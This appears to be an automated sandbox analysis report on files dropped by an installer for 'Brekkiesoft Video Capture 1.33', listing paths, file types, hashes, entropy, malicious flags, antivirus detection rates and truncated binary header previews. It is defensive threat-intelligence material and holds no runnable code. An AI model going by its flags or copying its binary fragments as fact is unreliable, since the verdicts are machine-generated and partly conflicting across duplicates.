                                                                                                                                      SSDEEP:3072:l9iEoC1+7N9UQV2Mi8NTUU3/EO3h3E9y6GeoPRtsoWhi75MUbvSHQ:l+ssU62Mi8x9P/UVGeQRthMUbvS
                                                                                                                                      MD5:FEC4FF0C2967A05543747E8D552CF9DF
                                                                                                                                      SHA1:B4449DC0DF8C0AFCC9F32776384A6F5B5CEDE20C
                                                                                                                                      SHA-256:5374148EBCF4B456F8711516A58C9A007A393CA88F3D9759041F691E4343C7D6
                                                                                                                                      SHA-512:93E3F48CD393314178CBC86F6142D577D5EAAE52B47C4D947DBA4DFB706860B150FF5B0E546CB83114CA44666E9DF6021964D79D064B775A58698DAA9550EF13
                                                                                                                                      Malicious:true
                                                                                                                                      Antivirus:
                                                                                                                                      • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........+0.J^..J^..J^.cE...J^..VR..J^..UU..J^.#VP..J^..UT..J^..UZ..J^..kU..J^..kZ..J^..J_..J^..iT..J^..io..J^.gLX..J^._jZ..J^.Rich.J^.................PE..L.....L...........!.....0...@.......'.......@...................................................................... e..k....X..d....`.......................p..p....................................................@...............................text....".......0.................. ..`.rdata...%...@...0...@..............@..@.data...T....p... ...p..............@....rsrc........`......................@..@.reloc.......p......................@..B........................................................................................................................................................................................................................................................................................
                                                                                                                                      Process:C:\Users\user\AppData\Local\Temp\is-QMI42.tmp\list.tmp
                                                                                                                                      File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                      Category:modified
                                                                                                                                      Size (bytes):3409347
                                                                                                                                      Entropy (8bit):6.363850056196269
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:49152:vyU0yCdW+Hrrg6L7aXt8KiIt69RoRWEZhig/nm5i4WrzG3Hg:vj0PxLE6Y8KiIs9RQ7Zhig/nm5BV3Hg
                                                                                                                                      MD5:A5B9D0E5F04BC3D01C9E97A61F27EB8F
                                                                                                                                      SHA1:7A08B8C0D7C8223F79DFFA1EA3C7415EC298DB27
                                                                                                                                      SHA-256:736FBECCE9DB80A4E4D376AFBB653CB4356912E75D6B805303D09E8129F07C83
                                                                                                                                      SHA-512:AE55F4FC99A54D40C4912F562805B644BC05F40D9A9673D943F52A59DC3D049387DA796E96C984AA3C70CC41B5F2E1196FADC4D55EE6AE5241B4F5A869918E13
                                                                                                                                      Malicious:true
                                                                                                                                      Yara Hits:
                                                                                                                                      • Rule: JoeSecurity_DelphiSystemParamCount, Description: Detected Delphi use of System.ParamCount(), Source: C:\Users\user\AppData\Local\Brekkiesoft Video Capture 1.33\bsoftvideocapture33.exe, Author: Joe Security
                                                                                                                                      Antivirus:
                                                                                                                                      • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                      • Antivirus: ReversingLabs, Detection: 38%
                                                                                                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......................PE..L...0vag.....................l......4D............@..........................`4.......4.....................................,........@..................................................................................T..........................._aett_1............................ ..`_aftt_1..-..........................@..@_agtt_1..d.......2..................@....rsrc........@......................@..@_ahtt_1..@... ...?..................`...........................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                      Process:C:\Users\user\AppData\Local\Temp\is-QMI42.tmp\list.tmp
                                                                                                                                      File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):1645320
                                                                                                                                      Entropy (8bit):6.787752063353702
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:24576:Fk18V2mHkfIE3Ip9vkWEgDecZV3W9kpOuRw8RhWd5Ixwzr6lOboU7j97S9D+z98v:FZNkf+uW3D1ZVG9kVw8I5Rv6lwH9+X
                                                                                                                                      MD5:871C903A90C45CA08A9D42803916C3F7
                                                                                                                                      SHA1:D962A12BC15BFB4C505BB63F603CA211588958DB
                                                                                                                                      SHA-256:F1DA32183B3DA19F75FA4EF0974A64895266B16D119BBB1DA9FE63867DBA0645
                                                                                                                                      SHA-512:985B0B8B5E3D96ACFD0514676D9F0C5D2D8F11E31F01ACFA0F7DA9AF3568E12343CA77F541F55EDDA6A0E5C14FE733BDA5DC1C10BB170D40D15B7A60AD000145
                                                                                                                                      Malicious:false
                                                                                                                                      Antivirus:
                                                                                                                                      • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......s...7o..7o..7o...L..<o..7o..en...L..$o...L...o...L..6o...L..6o...L..(n...L..6o..Rich7o..................PE..L.....D@...........!.........`.......Q.......`.....p................................................................l...CN..|...x....p...........................s.....8...............................................0............................text...n........................... ..`.data...X...........................@...Shared.......`.......P..............@....rsrc........p... ...`..............@..@.reloc...s..........................@..B................................................................................................................................................................................................................................................................................................................................
                                                                                                                                      Process:C:\Users\user\AppData\Local\Temp\is-QMI42.tmp\list.tmp
                                                                                                                                      File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):499712
                                                                                                                                      Entropy (8bit):6.414789978441117
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:12288:fJzxYPVsBnxO/R7krZhUgiW6QR7t5k3Ooc8iHkC2eq:fZxvBnxOJ7ki3Ooc8iHkC2e
                                                                                                                                      MD5:561FA2ABB31DFA8FAB762145F81667C2
                                                                                                                                      SHA1:C8CCB04EEDAC821A13FAE314A2435192860C72B8
                                                                                                                                      SHA-256:DF96156F6A548FD6FE5672918DE5AE4509D3C810A57BFFD2A91DE45A3ED5B23B
                                                                                                                                      SHA-512:7D960AA8E3CCE22D63A6723D7F00C195DE7DE83B877ECA126E339E2D8CC9859E813E05C5C0A5671A75BB717243E9295FD13E5E17D8C6660EB59F5BAEE63A7C43
                                                                                                                                      Malicious:false
                                                                                                                                      Antivirus:
                                                                                                                                      • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..............................................................................Rich...................PE..L.....w>...........!.................-............:|................................~e..............................$...?...d!..<....`.......................p...0..8...8...............................H............................................text............................... ..`.rdata..2*.......0..................@..@.data...h!...0... ...0..............@....rsrc........`.......P..............@..@.reloc...0...p...@...`..............@..B........................................................................................................................................................................................................................................................................................................................
                                                                                                                                      Process:C:\Users\user\AppData\Local\Temp\is-QMI42.tmp\list.tmp
                                                                                                                                      File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):645592
                                                                                                                                      Entropy (8bit):6.50414583238337
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:12288:i0zrcH2F3OfwjtWvuFEmhx0Cj37670jwX+E7tFKm0qTYh:iJUOfwh8u9hx0D70NE7tFTYh
                                                                                                                                      MD5:E477A96C8F2B18D6B5C27BDE49C990BF
                                                                                                                                      SHA1:E980C9BF41330D1E5BD04556DB4646A0210F7409
                                                                                                                                      SHA-256:16574F51785B0E2FC29C2C61477EB47BB39F714829999511DC8952B43AB17660
                                                                                                                                      SHA-512:335A86268E7C0E568B1C30981EC644E6CD332E66F96D2551B58A82515316693C1859D87B4F4B7310CF1AC386CEE671580FDD999C3BCB23ACF2C2282C01C8798C
                                                                                                                                      Malicious:true
                                                                                                                                      Antivirus:
                                                                                                                                      • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....=S.v..?......!................X..............`......................... ......8......... .................................L................................'......................................................p............................text...............................`.0`.data...............................@.@..rdata..$...........................@.@@.bss..................................@..edata..............................@.0@.idata..L...........................@.0..CRT................................@.0..tls.... ...........................@.0..reloc...'.......(..................@.0B/4......`....0......................@.@B/19..........@......................@..B/35.....M....P......................@..B/51.....`C...`...D..................@..B/63..................8..............@..B/77..................F..............@..B/89..................R..
                                                                                                                                      Process:C:\Users\user\AppData\Local\Temp\is-QMI42.tmp\list.tmp
                                                                                                                                      File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):348160
                                                                                                                                      Entropy (8bit):6.542655141037356
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:6144:OcV9z83OtqxnEYmt3NEnvfF+Tbmbw6An8FMciFMNrb3YgxxpbCAOxO2ElvlE:Ooz83OtIEzW+/m/AyF7bCrO/E
                                                                                                                                      MD5:86F1895AE8C5E8B17D99ECE768A70732
                                                                                                                                      SHA1:D5502A1D00787D68F548DDEEBBDE1ECA5E2B38CA
                                                                                                                                      SHA-256:8094AF5EE310714CAEBCCAEEE7769FFB08048503BA478B879EDFEF5F1A24FEFE
                                                                                                                                      SHA-512:3B7CE2B67056B6E005472B73447D2226677A8CADAE70428873F7EFA5ED11A3B3DBF6B1A42C5B05B1F2B1D8E06FF50DFC6532F043AF8452ED87687EEFBF1791DA
                                                                                                                                      Malicious:false
                                                                                                                                      Antivirus:
                                                                                                                                      • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........2..S..S..S..Tp..S..S..5S..BX..S..BX...S..BX..Q..BX..S..BX..S..BX..S..Rich.S..........................PE..L.....V>...........!................."............4|.........................`......................................t....C......(.... .......................0..d+..H...8...........................x...H...............l............................text............................... ..`.rdata..@...........................@..@.data... h.......`..................@....rsrc........ ......................@..@.reloc..d+...0...0... ..............@..B........................................................................................................................................................................................................................................................................................................................
                                                                                                                                      Process:C:\Users\user\AppData\Local\Temp\is-QMI42.tmp\list.tmp
                                                                                                                                      File Type:data
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):3409347
                                                                                                                                      Entropy (8bit):6.363849659253791
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:49152:iyU0yCdW+Hrrg6L7aXt8KiIt69RoRWEZhig/nm5i4WrzG3Hg:ij0PxLE6Y8KiIs9RQ7Zhig/nm5BV3Hg
                                                                                                                                      MD5:E68B0C2B1D44B26ED7983319E7A9ECAC
                                                                                                                                      SHA1:0338F9C6D61156238A2266B55D107027C4C7BCD9
                                                                                                                                      SHA-256:2DEADE9C6A9B89572C2A106321041E73DA1028923788E4FDE086B79BA01E5A25
                                                                                                                                      SHA-512:02C823A86CBA517901822F995ECC6E290233621796088A37FCE7CD64EE97062CC3D55DF12B87D9D1076BA985040C386F5EB31847B08742E05927AF43CD202006
                                                                                                                                      Malicious:false
                                                                                                                                      Yara Hits:
                                                                                                                                      • Rule: JoeSecurity_DelphiSystemParamCount, Description: Detected Delphi use of System.ParamCount(), Source: C:\Users\user\AppData\Local\Brekkiesoft Video Capture 1.33\is-7DT4P.tmp, Author: Joe Security
                                                                                                                                      Preview:.Z......................@...............................................!..L.!This program cannot be run in DOS mode....$.......................PE..L...0vag.....................l......4D............@..........................`4.......4.....................................,........@..................................................................................T..........................._aett_1............................ ..`_aftt_1..-..........................@..@_agtt_1..d.......2..................@....rsrc........@......................@..@_ahtt_1..@... ...?..................`...........................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                      Process:C:\Users\user\AppData\Local\Temp\is-QMI42.tmp\list.tmp
                                                                                                                                      File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):176128
                                                                                                                                      Entropy (8bit):6.204917493416147
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:3072:l9iEoC1+7N9UQV2Mi8NTUU3/EO3h3E9y6GeoPRtsoWhi75MUbvSHQ:l+ssU62Mi8x9P/UVGeQRthMUbvS
                                                                                                                                      MD5:FEC4FF0C2967A05543747E8D552CF9DF
                                                                                                                                      SHA1:B4449DC0DF8C0AFCC9F32776384A6F5B5CEDE20C
                                                                                                                                      SHA-256:5374148EBCF4B456F8711516A58C9A007A393CA88F3D9759041F691E4343C7D6
                                                                                                                                      SHA-512:93E3F48CD393314178CBC86F6142D577D5EAAE52B47C4D947DBA4DFB706860B150FF5B0E546CB83114CA44666E9DF6021964D79D064B775A58698DAA9550EF13
                                                                                                                                      Malicious:true
                                                                                                                                      Antivirus:
                                                                                                                                      • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........+0.J^..J^..J^.cE...J^..VR..J^..UU..J^.#VP..J^..UT..J^..UZ..J^..kU..J^..kZ..J^..J_..J^..iT..J^..io..J^.gLX..J^._jZ..J^.Rich.J^.................PE..L.....L...........!.....0...@.......'.......@...................................................................... e..k....X..d....`.......................p..p....................................................@...............................text....".......0.................. ..`.rdata...%...@...0...@..............@..@.data...T....p... ...p..............@....rsrc........`......................@..@.reloc.......p......................@..B........................................................................................................................................................................................................................................................................................
                                                                                                                                      Process:C:\Users\user\AppData\Local\Temp\is-QMI42.tmp\list.tmp
                                                                                                                                      File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):1645320
                                                                                                                                      Entropy (8bit):6.787752063353702
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:24576:Fk18V2mHkfIE3Ip9vkWEgDecZV3W9kpOuRw8RhWd5Ixwzr6lOboU7j97S9D+z98v:FZNkf+uW3D1ZVG9kVw8I5Rv6lwH9+X
                                                                                                                                      MD5:871C903A90C45CA08A9D42803916C3F7
                                                                                                                                      SHA1:D962A12BC15BFB4C505BB63F603CA211588958DB
                                                                                                                                      SHA-256:F1DA32183B3DA19F75FA4EF0974A64895266B16D119BBB1DA9FE63867DBA0645
                                                                                                                                      SHA-512:985B0B8B5E3D96ACFD0514676D9F0C5D2D8F11E31F01ACFA0F7DA9AF3568E12343CA77F541F55EDDA6A0E5C14FE733BDA5DC1C10BB170D40D15B7A60AD000145
                                                                                                                                      Malicious:false
                                                                                                                                      Antivirus:
                                                                                                                                      • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......s...7o..7o..7o...L..<o..7o..en...L..$o...L...o...L..6o...L..6o...L..(n...L..6o..Rich7o..................PE..L.....D@...........!.........`.......Q.......`.....p................................................................l...CN..|...x....p...........................s.....8...............................................0............................text...n........................... ..`.data...X...........................@...Shared.......`.......P..............@....rsrc........p... ...`..............@..@.reloc...s..........................@..B................................................................................................................................................................................................................................................................................................................................
                                                                                                                                      Process:C:\Users\user\AppData\Local\Temp\is-QMI42.tmp\list.tmp
                                                                                                                                      File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):445440
                                                                                                                                      Entropy (8bit):6.439135831549689
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:12288:sosmML3+OytpWFkCU1wayvT33iiDNmAE27R9sY9kP0O+:soslvJ3RaY9wU
                                                                                                                                      MD5:CAC7E17311797C5471733638C0DC1F01
                                                                                                                                      SHA1:58E0BD1B63525A2955439CB9BE3431CEA7FF1121
                                                                                                                                      SHA-256:19248357ED7CFF72DEAD18B5743BF66C61438D68374BDA59E3B9D444C6F8F505
                                                                                                                                      SHA-512:A677319AC8A2096D95FFC69F22810BD4F083F6BF55B8A77F20D8FB8EE01F2FEE619CE318D1F55C392A8F3A4D635D9285712E2C572E62997014641C36EDC060A2
                                                                                                                                      Malicious:true
                                                                                                                                      Antivirus:
                                                                                                                                      • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...*..=...........!.........\......@!....................................... .......................'..........................P.......H.......................l....................................................................................text............................... ..`.rdata..2$.......&..................@..@.data...............................@....idata..............................@....rsrc...H...........................@..@.reloc...&.......(..................@..B................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                      Process:C:\Users\user\AppData\Local\Temp\is-QMI42.tmp\list.tmp
                                                                                                                                      File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):265728
                                                                                                                                      Entropy (8bit):6.4472652154517345
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:6144:Fs7u3JL96d15Y2BmKh678IuYAhN3YCjlgiZioXyLWvCe93rZ5WZOlUmpNJ5mlbb/:e7WJL96d15Y2BmKh678IuYAhN3YCjlgw
                                                                                                                                      MD5:752CA72DE243F44AF2ED3FF023EF826E
                                                                                                                                      SHA1:7B508F6B72BD270A861B368EC9FE4BF55D8D472F
                                                                                                                                      SHA-256:F8196F03F8CBED87A92BA5C1207A9063D4EEBB0C22CA88A279F1AE1B1F1B8196
                                                                                                                                      SHA-512:4E5A7242C25D4BBF9087F813D4BF057432271A0F08580DA8C894B7C290DE9E0CF640F6F616B0B6C6CAD14DC0AFDD2697D2855BA4070270824540BAE835FE8C4A
                                                                                                                                      Malicious:true
                                                                                                                                      Antivirus:
                                                                                                                                      • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...?..=...........!................`;.......................................P.......................'..............p...o.......d.... .......................0..\.......................................................4............................text...k........................... ..`.rdata..............................@..@.data....9.......0..................@....idata..............................@....rsrc........ ......................@..@.reloc..T....0......................@..B................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                      Process:C:\Users\user\AppData\Local\Temp\is-QMI42.tmp\list.tmp
                                                                                                                                      File Type:MS Windows HtmlHelp Data
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):78183
                                                                                                                                      Entropy (8bit):7.692742945771669
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:1536:Bkt2SjEQ3r94YqwyadpL1X6Dtn4afF1VowWb8ZmmUQNk3gNqCLbMsFxJse8hbpmn:mR/CYj9dp5XIyI2b/mY3gNjLbMsOaP
                                                                                                                                      MD5:B1B9E6D43319F6D4E52ED858C5726A97
                                                                                                                                      SHA1:5033047A30CCCF57783C600FD76A6D220021B19D
                                                                                                                                      SHA-256:8003A4A0F9F5DFB62BEFBF81F8C05894B0C1F987ACFC8654A6C6CE02B6213910
                                                                                                                                      SHA-512:E56D6EC9170DEBAC28BB514942F794F73D4C194D04C54EFF9227B6EE3C74BA4FCF239FFF0BB6556DC8B847FA89D382AF206A2C481C41A3510936B0A74192D2C2
                                                                                                                                      Malicious:false
                                                                                                                                      Preview:ITSF....`..........E.......|.{.......".....|.{......."..`...............x.......T.......................g1..............ITSP....T...........................................j..].!......."..T...............PMGLW................/..../#IDXHDR...F.../#ITBITS..../#IVB...N$./#STRINGS.....P./#SYSTEM..N.'./#TOPICS...F.0./#URLSTR...:.t./#URLTBL...v.D./$FIftiMain......1./$OBJINST...z.../$WWAssociativeLinks/..../$WWAssociativeLinks/Property...v../$WWKeywordLinks/..../$WWKeywordLinks/Property...r../After.jpg...4..../Auto-.hhc...^./Auto-Adjustment.htm....?./Auto-BleachTeeth.htm...z.3./Auto-Crop2Plus.htm..U.j./Auto-Emphasis.htm...w.V./Auto-EyeColor.htm...!.../Auto-EyePencil.htm..._.../Auto-EyeShadow.htm...,.3./Auto-GettingStarted.htm....Q./Auto-Lipstick.htm..R.M./Auto-Liquify.htm...-.v./Auto-Menu.htm..S.r./Auto-OrderingInformation.htm...Q.../Auto-Overview.htm..^.$./Auto-Powder.htm......./Auto-Resize.htm..s.b./Auto-Rotation.htm..?.e./Auto-Rouge.htm...=.d./Auto-SkinCare.htm...|.{./Auto-SmartPatchCosmet
                                                                                                                                      Process:C:\Users\user\AppData\Local\Temp\is-QMI42.tmp\list.tmp
                                                                                                                                      File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):445440
                                                                                                                                      Entropy (8bit):6.439135831549689
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:12288:sosmML3+OytpWFkCU1wayvT33iiDNmAE27R9sY9kP0O+:soslvJ3RaY9wU
                                                                                                                                      MD5:CAC7E17311797C5471733638C0DC1F01
                                                                                                                                      SHA1:58E0BD1B63525A2955439CB9BE3431CEA7FF1121
                                                                                                                                      SHA-256:19248357ED7CFF72DEAD18B5743BF66C61438D68374BDA59E3B9D444C6F8F505
                                                                                                                                      SHA-512:A677319AC8A2096D95FFC69F22810BD4F083F6BF55B8A77F20D8FB8EE01F2FEE619CE318D1F55C392A8F3A4D635D9285712E2C572E62997014641C36EDC060A2
                                                                                                                                      Malicious:true
                                                                                                                                      Antivirus:
                                                                                                                                      • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...*..=...........!.........\......@!....................................... .......................'..........................P.......H.......................l....................................................................................text............................... ..`.rdata..2$.......&..................@..@.data...............................@....idata..............................@....rsrc...H...........................@..@.reloc...&.......(..................@..B................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                      Process:C:\Users\user\AppData\Local\Temp\is-QMI42.tmp\list.tmp
                                                                                                                                      File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):499712
                                                                                                                                      Entropy (8bit):6.414789978441117
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:12288:fJzxYPVsBnxO/R7krZhUgiW6QR7t5k3Ooc8iHkC2eq:fZxvBnxOJ7ki3Ooc8iHkC2e
                                                                                                                                      MD5:561FA2ABB31DFA8FAB762145F81667C2
                                                                                                                                      SHA1:C8CCB04EEDAC821A13FAE314A2435192860C72B8
                                                                                                                                      SHA-256:DF96156F6A548FD6FE5672918DE5AE4509D3C810A57BFFD2A91DE45A3ED5B23B
                                                                                                                                      SHA-512:7D960AA8E3CCE22D63A6723D7F00C195DE7DE83B877ECA126E339E2D8CC9859E813E05C5C0A5671A75BB717243E9295FD13E5E17D8C6660EB59F5BAEE63A7C43
                                                                                                                                      Malicious:false
                                                                                                                                      Antivirus:
                                                                                                                                      • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..............................................................................Rich...................PE..L.....w>...........!.................-............:|................................~e..............................$...?...d!..<....`.......................p...0..8...8...............................H............................................text............................... ..`.rdata..2*.......0..................@..@.data...h!...0... ...0..............@....rsrc........`.......P..............@..@.reloc...0...p...@...`..............@..B........................................................................................................................................................................................................................................................................................................................
                                                                                                                                      Process:C:\Users\user\AppData\Local\Temp\is-QMI42.tmp\list.tmp
                                                                                                                                      File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):348160
                                                                                                                                      Entropy (8bit):6.542655141037356
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:6144:OcV9z83OtqxnEYmt3NEnvfF+Tbmbw6An8FMciFMNrb3YgxxpbCAOxO2ElvlE:Ooz83OtIEzW+/m/AyF7bCrO/E
                                                                                                                                      MD5:86F1895AE8C5E8B17D99ECE768A70732
                                                                                                                                      SHA1:D5502A1D00787D68F548DDEEBBDE1ECA5E2B38CA
                                                                                                                                      SHA-256:8094AF5EE310714CAEBCCAEEE7769FFB08048503BA478B879EDFEF5F1A24FEFE
                                                                                                                                      SHA-512:3B7CE2B67056B6E005472B73447D2226677A8CADAE70428873F7EFA5ED11A3B3DBF6B1A42C5B05B1F2B1D8E06FF50DFC6532F043AF8452ED87687EEFBF1791DA
                                                                                                                                      Malicious:false
                                                                                                                                      Antivirus:
                                                                                                                                      • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........2..S..S..S..Tp..S..S..5S..BX..S..BX...S..BX..Q..BX..S..BX..S..BX..S..Rich.S..........................PE..L.....V>...........!................."............4|.........................`......................................t....C......(.... .......................0..d+..H...8...........................x...H...............l............................text............................... ..`.rdata..@...........................@..@.data... h.......`..................@....rsrc........ ......................@..@.reloc..d+...0...0... ..............@..B........................................................................................................................................................................................................................................................................................................................
                                                                                                                                      Process:C:\Users\user\AppData\Local\Temp\is-QMI42.tmp\list.tmp
                                                                                                                                      File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):645592
                                                                                                                                      Entropy (8bit):6.50414583238337
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:12288:i0zrcH2F3OfwjtWvuFEmhx0Cj37670jwX+E7tFKm0qTYh:iJUOfwh8u9hx0D70NE7tFTYh
                                                                                                                                      MD5:E477A96C8F2B18D6B5C27BDE49C990BF
                                                                                                                                      SHA1:E980C9BF41330D1E5BD04556DB4646A0210F7409
                                                                                                                                      SHA-256:16574F51785B0E2FC29C2C61477EB47BB39F714829999511DC8952B43AB17660
                                                                                                                                      SHA-512:335A86268E7C0E568B1C30981EC644E6CD332E66F96D2551B58A82515316693C1859D87B4F4B7310CF1AC386CEE671580FDD999C3BCB23ACF2C2282C01C8798C
                                                                                                                                      Malicious:true
                                                                                                                                      Antivirus:
                                                                                                                                      • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....=S.v..?......!................X..............`......................... ......8......... .................................L................................'......................................................p............................text...............................`.0`.data...............................@.@..rdata..$...........................@.@@.bss..................................@..edata..............................@.0@.idata..L...........................@.0..CRT................................@.0..tls.... ...........................@.0..reloc...'.......(..................@.0B/4......`....0......................@.@B/19..........@......................@..B/35.....M....P......................@..B/51.....`C...`...D..................@..B/63..................8..............@..B/77..................F..............@..B/89..................R..
                                                                                                                                      Process:C:\Users\user\AppData\Local\Temp\is-QMI42.tmp\list.tmp
                                                                                                                                      File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):717985
                                                                                                                                      Entropy (8bit):6.514892762109474
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:12288:5TPcYn5c/rPx37/zHBA6a5UeYpthr1CERAgrNuR+cIq5MRxyFW:pPcYn5c/rPx37/zHBA6pFptZ1CEhqMRP
                                                                                                                                      MD5:3D980E66654B6000D5D70CF137B56E1B
                                                                                                                                      SHA1:49CC7B58DD461A21F2AB81545D71820B7DF921EA
                                                                                                                                      SHA-256:73653CC7CF03FD06D7396E928CA524CD391B2BD061B031DA99F4E81E161B14B2
                                                                                                                                      SHA-512:1F901F98FA687FFA86D2B07FC9D0123444889D4BC4C1C2AD29E2F3750D3F7DAB3CEB87ED8FA4F62BB8E063234699EE2ACB39416418A188499ABA5DB301D10531
                                                                                                                                      Malicious:true
                                                                                                                                      Antivirus:
                                                                                                                                      • Antivirus: ReversingLabs, Detection: 4%
                                                                                                                                      Preview:MZP.....................@.......................InUn....................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L....^B*.................~........................@..............................................@...............................%..................................................................................................................CODE.....}.......~.................. ..`DATA................................@...BSS......................................idata...%.......&..................@....tls.....................................rdata..............................@..P.reloc....... ......................@..P.rsrc...............................@..P.....................T..............@..P........................................................................................................................................
                                                                                                                                      Process:C:\Users\user\AppData\Local\Temp\is-QMI42.tmp\list.tmp
                                                                                                                                      File Type:InnoSetup Log Brekkiesoft Video Capture, version 0x30, 5065 bytes, 216865\user, "C:\Users\user\AppData\Local\Brekkiesoft Video Capture 1.33"
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):5065
                                                                                                                                      Entropy (8bit):4.833268307173751
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:96:1UYCdWb38MpQ6c79f+eOIhua7ICSss/Lnv2XNR4:1wdWb3npQwHIhZICSsAnA4
                                                                                                                                      MD5:0128936CB7758CDFDF4B66AB01827F1B
                                                                                                                                      SHA1:CFAFFE7AE0B328890D9B875CAADA758EE955F49D
                                                                                                                                      SHA-256:8551C93FEE4795CA4F6B7BECD35921A82460E94DF77A0EF1663E5B2C26908767
                                                                                                                                      SHA-512:D8591FFC7138FECB38320E334216B2EFCA988C9A32DD97945355B30793532789302131F72826548848A1478E3BC96224CF1FEC0ABD920AF577DCF66C22AC7D29
                                                                                                                                      Malicious:false
                                                                                                                                      Preview:Inno Setup Uninstall Log (b)....................................Brekkiesoft Video Capture.......................................................................................................Brekkiesoft Video Capture.......................................................................................................0...........%................................................................................................................g............78......c....216865.user?C:\Users\user\AppData\Local\Brekkiesoft Video Capture 1.33...........;...... ............IFPS.............................................................................................................BOOLEAN..............TWIZARDFORM....TWIZARDFORM.........TPASSWORDEDIT....TPASSWORDEDIT...........................................!MAIN....-1..(...dll:kernel32.dll.CreateFileA..............$...dll:kernel32.dll.WriteFile............"...dll:kernel32.dll.CloseHandle........"...dll:kernel32.dll.ExitProcess...
                                                                                                                                      Process:C:\Users\user\AppData\Local\Temp\is-QMI42.tmp\list.tmp
                                                                                                                                      File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):717985
                                                                                                                                      Entropy (8bit):6.514892762109474
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:12288:5TPcYn5c/rPx37/zHBA6a5UeYpthr1CERAgrNuR+cIq5MRxyFW:pPcYn5c/rPx37/zHBA6pFptZ1CEhqMRP
                                                                                                                                      MD5:3D980E66654B6000D5D70CF137B56E1B
                                                                                                                                      SHA1:49CC7B58DD461A21F2AB81545D71820B7DF921EA
                                                                                                                                      SHA-256:73653CC7CF03FD06D7396E928CA524CD391B2BD061B031DA99F4E81E161B14B2
